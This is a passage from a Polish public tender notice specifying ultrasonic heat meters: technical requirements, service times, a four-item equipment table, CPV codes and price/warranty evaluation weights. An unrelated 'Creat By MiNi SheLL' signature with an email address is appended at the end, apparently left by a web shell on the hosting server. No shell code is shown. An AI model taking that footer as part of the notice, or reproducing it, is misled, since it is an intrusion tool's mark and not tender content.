4.	Elementy składowe ciepłomierza posiadające zatwierdzenie typu muszą być zalegalizowane, a cecha roczna musi być z danego roku dostawy. Elementy muszą posiadać legalizację na okres 5 lat od daty produkcji.
5.	Wykonawca zapewnia serwis dostępny  w niżej wymienionych zakresach i czasach:
	zmiana impulsowania przelicznika - do 5 dni roboczych,
	zmiana sposobu zabudowy (zasilania/powrót)  do 5 dni roboczych,
	kasowanie błędów do 5 dni roboczych,
	wymiana baterii - do 5 dni roboczych,
	legalizacja poserwisowa  do 7 dni roboczych,
	naprawa lub wymiana uszkodzonego licznika lub jego elementu  - do 5 dni roboczych.
6.	Ciepłomierze muszą być wyposażone moduł M-BUS oraz opcjonalnie ( dopuszcza się dostarczenie kart osobno)w karty radiowe do odczytów liczników w systemie radiowym. 
7.	Zakres pomiaru temperatur przez ciepłomierz co najmniej 5-150 C.
8.	Pomiar temperatur czujnikami Pt 500. 
9.	Stopień ochrony obudowy min. IP 54;
10.	Ciepłomierz muszą posiadać złącze (gniazdo lub głowicę optyczną)  umożliwiające komunikację  z urządzeniem.
11.	Zabudowa rozłączna ciepłomierzy   montaż przelicznika  naścienny; możliwość montażu przeliczników na przetworniku przepływu bez dodatkowych elementów pośredniczących.
12.	Elementy do ciepłomierza i wodomierza powinny posiadać dokumentację techniczno-ruchową (DTR) i kartę katalogową w języku polskim.
13.	Do liczników należy dostarczyć osłony czujników kablowych ze stali kwasoodpornej. Nie dopuszcza się osłon z mosiądzu oraz tworzyw sztucznych.
14.	Żywotność baterii w przeliczniku oraz wodomierzu min. 10 lat.
15.	Wymagane parametry dostępne na wyświetlaczu przelicznika LCD:
a)	zużycie energii cieplnej w GJ,
b)	objętość wody sieciowej,
c)	przepływ chwilowy m3/h; l/h,
d)	moc chwilowa kW, MW,
e)	data i czas,
f)	kody błędu,
g)	szczytowe wartości mocy i przepływu z datą ich wystąpienia,
h)	chwilowe wartości temperatury zasilania i powrotu.
16.	Przelicznik musi posiadać rejestrator danych w zakresie:
a)	Rejestr roczny, miesięczny, dobowy, godzinowy oraz rejestr błędów.
17.	W przypadku przetworników gwintowanych należy dostarczyć komplet półsrubunków do montażu.
18.	W przypadku przetworników kołnierzowych należy dostarczyć komplet kołnierzy przeciwstawnych do montażu.



II. Zestawienie liczników ciepła i wodomierzy:


L.P.	Nazwa urządzenia	Opis urządzenia	J.M.	Ilość
1	Licznik ciepła	Ultradźwiękowy przetwornik przepływu, Qp= 25m3/h, DN 65  PN 25 ,przelicznik z wyświetlaczem, para czujników min. 3 mb. , tuleje do PT 500 90mm stal nierdzewna. Przetwornik montowany na powrocie, dł. Zabudowy 300 mm + M-BUS	Kpl.	5
2	Licznik ciepła	Ultradźwiękowy przetwornik przepływu, Qp= 60m3/h,  PN 25, DN 100 , przelicznik z wyświetlaczem, para czujników min. 3 mb.  tuleje do PT 500 90mm.  Przetwornik montowany na powrocie. dł. Zabudowy 360 mm + M-BUS	Kpl.	1
3	Licznik ciepła	Ultradźwiękowy przetwornik przepływu, Qp=6m3/h,  G1 1 /4 B (R1) PN16 tuleje do PT  500 65mm,  PN 16 , przelicznik z wyświetlaczem, para czujników min. 3 mb. Przetwornik montowany na powrocie. dł. Zabudowy 260 mm + M-BUS	Kpl.	1
4	Licznik ciepła	Ultradźwiękowy przetwornik przepływu, Qp=150m3/h,  DN 150, tuleje do PT  500 140mm,  PN 25 , przelicznik z wyświetlaczem, para czujników min. 3 mb. Przetwornik montowany na powrocie. dł. Zabudowy 500 mm + M-BUS	Kpl.	1


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>38550000-5, 38551000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com